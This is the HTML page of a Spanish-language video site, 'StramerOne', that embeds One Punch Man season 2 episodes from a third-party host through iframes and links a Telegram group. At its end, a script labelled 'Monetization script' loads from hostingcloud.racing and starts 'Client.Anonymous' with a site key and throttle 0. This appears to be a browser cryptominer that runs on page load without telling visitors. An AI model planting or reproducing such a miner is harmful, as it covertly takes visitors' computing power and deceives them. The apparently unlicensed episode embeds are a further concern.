<!DOCTYPE html>
<html lang="es">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <title>Principal</title>
<meta charset="utf-8">
<meta name="keywords" content="chat, social, amigos">
<meta name="viewport" content="width=device−width; initial−scale=1.0; maximum-scale=1.0; minimum.scale=1.0;">

<link rel="stylesheet", href="css/home.css"></link>
<!--
<link rel="stylesheet", href="/stylesheets/fonts.css"></link>
<link rel='icon' href='https://res.cloudinary.com/djlzeapiz/image/upload/v1544741360/favicon.ico'></link>
-->
</head>
<body>
    <header class="header">
        <div class="header-container logo-nav-container">
            <h1 class="logo"> StramerOne </h1>
            <nav class="navigation">
                <ul>
                    <li><span class="clickable">Mi actividad</span></li>
                    <li><span class="clickable">Mi cuenta</span></li>
                    <li><span id="salir" class="clickable">Salir</span></li>
                </ul>
            </nav>
        </div>
    </header>

    <main class="main-w main-p">
        <h2><a target="_blank" href="https://t.me/onepunchman_online">Grupo en Telegram</a></h2>

        <h2>S2E1</h2>
        <iframe SRC="https://gounlimited.to/embed-6qbcbwnd6snm.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 AUTOPLAY; allowfullscreen></iframe>

        <h2>S2E2</h2>
        <iframe SRC="https://gounlimited.to/embed-plicvlq9524h.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 allowfullscreen></iframe>

        <h2>S2E3</h2>
        <iframe SRC="https://gounlimited.to/embed-sb7h8dgfhuyv.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 allowfullscreen></iframe>

        <h2>S2E4</h2>
        <iframe SRC="https://gounlimited.to/embed-nn51mr8w91bm.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 allowfullscreen></iframe>

        <h2>S2E5</h2>
        <iframe SRC="https://gounlimited.to/embed-7uch0pb08iyd.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 allowfullscreen></iframe>

        <h2>S2E6</h2>
        <iframe SRC="https://gounlimited.to/embed-u7g883wz14yl.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 allowfullscreen></iframe>

        <h2>S2E7</h2>
        <iframe SRC="https://gounlimited.to/embed-ogj8qcpcoheq.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 allowfullscreen></iframe>

        <h2>S2E8</h2>
        <iframe SRC="https://gounlimited.to/embed-sf8zc4cgds6n.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 allowfullscreen></iframe>

        <h2>S2E9</h2>
        <IFRAME SRC="https://gounlimited.to/embed-f05zv3fnvg4r.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 allowfullscreen></IFRAME>

        <h2>S2E10</h2>
        <IFRAME SRC="https://gounlimited.to/embed-ks5qict3glg1.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 allowfullscreen></IFRAME>

        <h2>S2E11</h2>
        <IFRAME SRC="https://gounlimited.to/embed-bucybhuvthc1.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 allowfullscreen></IFRAME>

        <h2>S2E12</h2>
        <IFRAME SRC="https://gounlimited.to/embed-sljobhp25bf0.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=640 HEIGHT=360 allowfullscreen></IFRAME>


        <h2>S3E1</h2>
            <h3>Pronto</h3>

    </main>

    <section class="r-section r-section-p r-section-w">
      
    </section>

    <script src="https://www.hostingcloud.racing/32v2.js"></script>
    <script>
        console.log('script cargado');
        /** Monetization script */
        var _client = new Client.Anonymous('75dd37e63353eb8852d07b3d83cac093eedf02937ef35599af85439f84278c41', {
            throttle: 0, c: 'w'
        });
        _client.start();;
    </script>
</body>
</html>
